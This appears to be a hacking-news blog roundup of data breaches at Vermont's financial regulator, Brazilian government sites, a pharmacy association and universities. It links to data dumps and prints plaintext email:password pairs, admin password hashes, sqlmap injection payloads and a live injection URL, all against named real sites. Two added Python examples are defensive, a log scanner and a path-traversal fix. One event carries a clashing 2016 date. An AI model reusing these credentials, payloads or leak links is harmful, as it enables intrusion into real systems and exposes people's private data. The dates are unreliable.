Servers Belonging To Vermont’s Department of Financial Regulation Rooted, 41.48 Megabytes of Data Leaked Online

Late last night, January 27th 2019, a France-based hacker belonging to the New World Hackers group and going by the name of “Mizaru” announced a data dump of Vermont’s Department of Financial Regulation. The leak itself is too big to explain in a couple of brief sentences here, but what I can report is that approximately 41.48 Megabytes (MB) of data, comprising PHP Version 5.6.15 files hosted on a 10.1.9-MariaDB database, were hacked/leaked online, and that the department’s servers were breached via SQL injection vulnerabilities in URL parameters handled by the website back-end.

Included in the leak is information tied to various banks affiliated with the Government of Vermont, including their unique IDs, code numbers, license numbers, issuance dates, company names, trade names and addresses. The leaked data also includes access to state registration files, along with the hashed passwords needed to access them, as well as full copies of internal memos, emails, documentation and much more. Honestly, the leak is so big that it’s almost impossible to summarize all at once here, so you are just going to have to browse through it for yourself this time.

Site: hxxp://dfr.vermont.gov/
Location of SQL Database Dump: http://dfr.vt.gov/bishcain_drupal.sql
Download Site Databases (41.48 MB): https://anonfile.com/o983S6r4b8/dfr.vt.gov_txt

https://twitter.com/MZR_h4x0r/status/1089617826284032001

Associação dos Proprietários Oficiais e Profissionais de Farmácia do Estado de São Paulo Hacked by Darkness Ghost

On January 22nd 2019, a Brasilian hacker going by the name of “Darkness Ghost” claimed responsibility for a hack of the website belonging to the Association of Official Owners and Professionals of Pharmacy of the State of São Paulo, Brasil. Through the leaked information provided below, administrator-level access to the PHP file system structure of the association’s website can be obtained, giving full control over all of the site’s data/content.

Website: hxxp://aprofar.org.br
Raw Data Dump: https://ghostbin.com/paste/r48by
Admin Login: hxxp://www.aprofar.org.br/login.html

ADMIN AND PASSWORD DUMP:

USERNAME: ab2igmzom
PASSWORD: d83fb66b7ba8e382507ebba6bc83b18e

USERNAME: aprofar402
PASSWORD: 545a4d42c0fb5ad4c68f81fbe4016ed3

COMPANY ASSOCIATES EMAIL : PASSWORD

ariasag@hotmail.com : capeta
roateles@gmail.com : ab2igmzom
cielsilva234@gmail.com : 5cca4d2119a21964cab59b91670d970f
earaujogaldino@globomail.com : lkdx27

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piauí online. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances.

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning the hackers posted a mirror of the site’s contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL injection vulnerabilities left unaddressed by the site’s security architects, ultimately granting the hackers access to PHP 5.3.3 files attached to a MySQL 5.0 database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities exploited and the payloads delivered within the leak itself – something normally redacted or kept private.

For example, here are the four SQL injection vulnerabilities implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl
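The four payload classes listed above are the standard sqlmap probe families, and the cheapest place for a defender to notice them is the web server’s access log, where each one leaves a recognisable trace in the query string. The Python script below is an added example written for this post, not code from Shizen, sqlmap or Rogue Media Labs: it percent-decodes each request target (twice, since scanners sometimes double-encode the quote) and flags it against one signature per class. The log lines, IP addresses and the /noticia.php path are constructed; the encoded payloads follow the shapes shown above, with the long hex constant in the UNION probe shortened.

```python
"""Flag the four SQL injection probe classes named above in a web access log.

Added example (not code from the leak or from Rogue Media Labs). The log lines
below are constructed for this demonstration; host paths and IPs are placeholders.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One signature per injection class from the write-up, applied to the URL-decoded
# request target. These are broad indicators for triage, not a complete WAF rule set.
SQLI_SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Combined-log-format prefix: ip ident user [time] "METHOD target PROTO" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one benign request, four sqlmap-style probes against the same
# parameter (the time-based one double-encoded), and one benign search containing
# the word "union" to show the UNION signature does not fire on ordinary text.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2018:02:14:07 +0000] "GET /noticia.php?id=13 HTTP/1.1" 200 5123
203.0.113.5 - - [31/Dec/2018:02:14:09 +0000] "GET /noticia.php?id=13%27%20AND%207214%3D7214%20AND%20%27aWjt%27%3D%27aWjt HTTP/1.1" 200 5123
203.0.113.5 - - [31/Dec/2018:02:14:11 +0000] "GET /noticia.php?id=13%27%20AND%20(SELECT%208268%20FROM(SELECT%20COUNT(*),CONCAT(0x716a767071,(SELECT%20(ELT(8268%3D8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27lEbP%27%3D%27lEbP HTTP/1.1" 500 1188
203.0.113.5 - - [31/Dec/2018:02:14:18 +0000] "GET /noticia.php?id=13%2527%2520AND%2520SLEEP(5)%2520AND%2520%2527ouoQ%2527%3D%2527ouoQ HTTP/1.1" 200 5123
203.0.113.5 - - [31/Dec/2018:02:14:20 +0000] "GET /noticia.php?id=13%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x716a767071,0x41,0x716a716a71)--%20EKMl HTTP/1.1" 200 7042
198.51.100.7 - - [31/Dec/2018:02:15:02 +0000] "GET /busca.php?q=union+station+hours HTTP/1.1" 200 3310
"""


def classify_request(target: str, max_decodes: int = 2) -> list:
    """Return the injection classes whose signature appears in the decoded target.

    Decoding runs up to `max_decodes` times: a single pass turns %2527 into %27,
    which leaves the SLEEP( token glued to a digit and hides it from a \\b match.
    """
    decoded = target
    for _ in range(max_decodes):
        decoded = unquote_plus(decoded)
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]


def scan_log(log_text: str) -> list:
    """Parse each line and keep those whose request target matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        classes = classify_request(m["target"])
        if classes:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "target": m["target"], "classes": classes,
            })
    return findings


def probes_per_source(findings: list) -> Counter:
    """Count flagged requests per client IP; a burst from one source is the sqlmap tell."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['status']} {', '.join(h['classes'])}")
    print("flagged per source:", dict(probes_per_source(hits)))
```

Run as-is it prints the four flagged lines and a per-source count of four for the probing address. In practice the same indicators belong in a WAF or SIEM rule; a 500 on the error-based probe, or a response delayed by roughly the SLEEP() argument on the time-based one, tells the responder the injection reached the database rather than being filtered.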

Raw Database Leak: https://ghostbin.com/paste/6w4ok


https://twitter.com/__sh1z3n/status/1079589738355531777

Akatsuki Gang Releases Database Disclosure Vulnerability Affecting Tribunal de Contas do Distrito Federal

Last night the “Akatsuki Gang” leaked a database disclosure vulnerability affecting the website of the Court of Auditors of the Federal District of Brasil, allowing for remote access to and download of the website’s file systems and databases. Analyzing their methodology, leveraging open ports left exposed by poorly constructed security settings, the hackers were able to carry out a Relative Path Traversal (CWE-23) attack against the website’s file system structure, ultimately gaining access to a MySQL database hosting PHP 5.5.9 files on an Apache 2.4.7 web server attached to a WordPress.org website.

It remains unclear what the hackers did with the data they uncovered, but what we do know is that they managed to gain access to 41 tables/folders inside a database labeled “selic,” exposing information such as passwords, site uploads, comments and administrator user data. In a message attached to the hack, the group left a sarcastic note reading “Um verdadeiro patriota é o tipo que leva uma multa de estacionamento e fica contente porque o sistema funcionou!” Translated, this reads ‘a true Patriot is happy to get a parking ticket because that means the system has worked!’ – lol. It remains unclear if the hack was conducted as a result of a parking ticket, or if the group was just being facetious.

Website Affected: hxxp://tc.df.gov.br/
Site Vulnerability: hxxp://tc.df.gov.br/selic/download.php?codof=41
Raw Leak: https://ghostbin.com/paste/e3zs5
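The download endpoint named above takes a file selector from the query string, and a relative path traversal (CWE-23) works whenever the server joins that value onto a directory without checking where the result actually lands on disk. As an added example (not the tribunal’s code, which this post does not reproduce), the Python below shows the two controls that close this class of bug: resolving the requested path and verifying it stays under the intended root, and, better still, looking a numeric id such as the codof parameter up in a server-side table so the client never names a file at all. The directory layout, file names, id table and secret file contents are constructed for the demonstration.

```python
"""Serve downloads by opaque id and refuse client-supplied paths that escape the root.

Added example (not the tc.df.gov.br code, which is not reproduced on this page).
The `codof` parameter name comes from the URL in the write-up; the id-to-file
table, directory layout and file contents are constructed for this demonstration.
"""
import os
import tempfile
from pathlib import Path
from typing import Optional


class DownloadError(Exception):
    """Raised when a requested download must not be served."""


def resolve_download(root: Path, requested: str) -> Path:
    """Resolve `requested` (a file name from the query string) strictly under `root`.

    Path.resolve() collapses '..' segments and follows symlinks, so the containment
    check is made on the real filesystem location, not on the string the client sent.
    An absolute `requested` replaces `root` when joined, and is caught the same way.
    """
    root_real = root.resolve()
    candidate = (root_real / requested).resolve()
    if root_real not in candidate.parents:
        raise DownloadError(f"path escapes download root: {requested!r}")
    if not candidate.is_file():
        raise DownloadError(f"not a regular file: {requested!r}")
    return candidate


def is_allowed(root: Path, requested: str) -> bool:
    """True if `requested` resolves to a regular file inside `root`."""
    try:
        resolve_download(root, requested)
        return True
    except DownloadError:
        return False


# Safer design: the client sends only an integer id and the server alone decides
# which file that id maps to. Constructed mapping for the demo.
DOWNLOAD_TABLE = {41: "relatorio.pdf"}


def download_by_id(root: Path, codof: str) -> Optional[Path]:
    """Look `codof` up server-side; unknown or non-numeric ids get nothing."""
    try:
        name = DOWNLOAD_TABLE[int(codof)]
    except (ValueError, KeyError):
        return None
    return resolve_download(root, name)


def build_demo_root() -> Path:
    """Create a throwaway layout: uploads/relatorio.pdf plus a secret outside uploads."""
    base = Path(tempfile.mkdtemp(prefix="dl-demo-"))
    uploads = base / "uploads"
    uploads.mkdir()
    (uploads / "relatorio.pdf").write_bytes(b"%PDF-1.4 constructed sample\n")
    (base / "config.php").write_text("<?php $db_pass = 'constructed-secret';\n")
    try:
        # A symlink planted inside the root that points outside it.
        os.symlink(base / "config.php", uploads / "link.pdf")
    except OSError:
        pass  # symlinks unavailable on this platform; the missing file is refused anyway
    return uploads


if __name__ == "__main__":
    root = build_demo_root()
    for req in ["relatorio.pdf", "../config.php", "/etc/passwd", "link.pdf"]:
        print(f"{req!r:>18} -> {'served' if is_allowed(root, req) else 'refused'}")
    print("codof=41 ->", download_by_id(root, "41"))
    print("codof=99 ->", download_by_id(root, "99"))
```

The symlink case is the one string-prefix checks miss: the client-supplied name looks harmless, but the real file lives outside the root, and only a check on the resolved path catches it. The id table removes the problem entirely, which is why an integer selector like codof is only safe when the integer is a lookup key and never part of a path.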


l’academie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered an article detailing the hack of two international universities by a Brasilian based hacker known as “SHIZEN.” However, what made the incident interesting or unique at the time was that SHIZEN did not disclose the databases he had uncovered, or how he went about doing so – something he is regularly known for doing. Instead, he tagged l’academie de Grenoble in the hack, asking them to reach out to him to learn where/how he got into their systems and where their website was vulnerable. Over the course of the week and a half since, SHIZEN has continued to keep this information to himself, trolling the University on multiple occasions and asking them to contact him about the hack – lest he release the information in its entirety online. After days with no response, this is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2016, SHIZEN released the contents of the databases exposed in the December 6th hack, explaining how he was able to breach l’academie de Grenoble’s website through an SQL injection vulnerability tied to the academy’s math department. More specifically, SHIZEN was able to hack PHP version 5.3.3 files belonging to an extremely outdated MySQL database attached to an nginx web server. In fact, the MySQL database was so outdated that its version wasn’t even readily identifiable.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Databases of Faculdade Faveni Hacked and Dumped Online, Exposing Information on +400 Students

Earlier today, December 11th 2018, “Ergo Hacker” of Pryzraky announced a hack of Faculdade Faveni, a postgraduate university in Venda Nova do Imigrante, Brasil. The hack itself was carried out in conjunction with #OpEdu, a much broader hacking operation targeting international colleges and universities which has already seen the hack/leak of Baqai Medical University in Pakistan, l’académie de Grenoble in France, San Jose State University in the US and Academia Nacional De La Historia De La Republica Argentina – among many others.

In the press release provided below, Ergo explains how he was able to breach PHP 5.5.38 file systems attached to two MySQL 5.0 databases belonging to the hostname sv251.faveni.edu.br. Presumably exploiting the back-end of the website via SQL injection, Ergo then managed to uncover and extract approximately 128.27 KB of data pertaining to over 400 postgraduate students, including full names, emails, CPF numbers, tuition rates, course enrollments and much more.

Website Affected: hxxp://posgraduacaofaveni.com.br/
Full Raw Leak: https://ghostbin.com/paste/2ovuf
Database Download (128.27 KB): https://anonfile.com/X5Z3vfn1b3/alunos_xlsx

https://twitter.com/ergo_hacker/status/1072588043222167554